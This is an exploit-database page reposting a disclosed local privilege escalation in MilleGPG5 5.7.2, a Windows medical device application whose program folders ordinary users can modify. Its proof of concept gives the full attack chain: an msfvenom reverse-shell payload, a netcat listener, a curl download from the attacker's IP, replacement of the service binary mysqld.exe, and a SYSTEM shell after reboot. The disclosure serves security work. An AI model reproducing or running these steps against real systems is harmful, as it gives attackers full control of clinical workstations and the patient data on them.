Millegpg5 5.7.2 luglio 2021 local privilege escalation Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-12-01 | Type : local | Platform : windows
This exploit / vulnerability Millegpg5 5.7.2 luglio 2021 local privilege escalation is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.7.2
# Tested on: Microsoft Windows 10 Enterprise x64

MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".

Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.

Affected version: MilleGPG5 5.7.2

# Details
# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

(1) Impacted services.
Any low privileged user can elevate their privileges abusing these services:

C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
C:\Program Files\MilleGPG5\GPGService.exe


Details:


SERVICE_NAME: MariaDB-GPG
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program
Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MariaDB-GPG
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

------

SERVICE_NAME: GPGOrchestrator
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : GPG Orchestrator
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

(2) Folder permissions.
Insecure folders permissions issue:


C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT
SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT
AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE
AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE
AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
...[SNIP]...
---------------

C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)


# Proof of Concept

1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start

3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

Millegpg5 5.7.2 luglio 2021 local privilege escalation


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Millegpg5 5.7.2 luglio 2021 local privilege escalation Vulnerability / Exploit